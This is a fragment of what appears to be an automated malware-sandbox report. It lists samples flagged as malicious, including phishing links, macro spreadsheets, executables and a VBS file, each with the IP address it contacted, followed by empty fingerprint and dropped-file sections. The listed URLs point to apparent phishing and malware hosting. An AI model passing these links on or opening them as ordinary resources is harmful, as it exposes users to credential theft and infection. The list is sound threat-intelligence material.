                                                                      https://onedrive.live.com/redir?resid=57A66C00F6A0889D%21174&authkey=%21AFlxjJ8AqLyC7WA&page=View&wd=target%28Quick%20Notes.one%7C413ef381-aa3c-4062-b71e-89358e1bcdfe%2FFOR%20YOUR%20REFERENCE%7C4a278fbe-a14f-4f9f-a8cc-a351162a9dd3%2F%29Get hashmaliciousBrowse
                                                                      • 104.16.132.229
                                                                      DOC014293_2020_04_09.xlsGet hashmaliciousBrowse
                                                                      • 52.114.74.44
                                                                      winlogon.exeGet hashmaliciousBrowse
                                                                      • 185.248.162.102
                                                                      https://1drv.ms/u/s!AjZbJqQuduUdaN8z0dBgPMZd3Ws?e=rZ5iVcGet hashmaliciousBrowse
                                                                      • 173.209.39.29
                                                                      http://groverwy.buzz/WeTransferGet hashmaliciousBrowse
                                                                      • 104.22.45.170
                                                                      coverage_WS974.xlsGet hashmaliciousBrowse
                                                                      • 51.254.58.126
                                                                      coverage_JB324.xlsGet hashmaliciousBrowse
                                                                      • 54.225.71.235
                                                                      DashlaneInst.exeGet hashmaliciousBrowse
                                                                      • 143.204.101.183
                                                                      coverage_MD365.xlsGet hashmaliciousBrowse
                                                                      • 51.254.58.126
                                                                      https://bitly.com/3catlBmGet hashmaliciousBrowse
                                                                      • 178.33.88.78
                                                                      V56hBLPv6K.exeGet hashmaliciousBrowse
                                                                      • 34.193.124.121
                                                                      https://test.mycrowd.jp/?u=cGhpbGxpcF9tYXJrc0BpYW1nb2xkLmNvbQ==Get hashmaliciousBrowse
                                                                      • 157.112.183.57
                                                                      https://linkedincorporatefile.me/recruiter.pdfGet hashmaliciousBrowse
                                                                      • 5.230.65.20
                                                                      http://www.fgoogle.de/mwg-internal/de5fs23hu73ds/files/ACCOR-Collection/js/accor_proxy.jsGet hashmaliciousBrowse
                                                                      • 185.53.179.24
                                                                      yNqNEspMoI.exeGet hashmaliciousBrowse
                                                                      • 35.244.218.203
                                                                      https://melias.se/string/4365850.zipGet hashmaliciousBrowse
                                                                      • 127.0.0.1
                                                                      f_000418.exeGet hashmaliciousBrowse
                                                                      • 77.234.45.9
                                                                      LRU0033987598750980983.vbsGet hashmaliciousBrowse
                                                                      • 15.188.119.127

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Screenshots

                                                                      Thumbnails

                                                                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.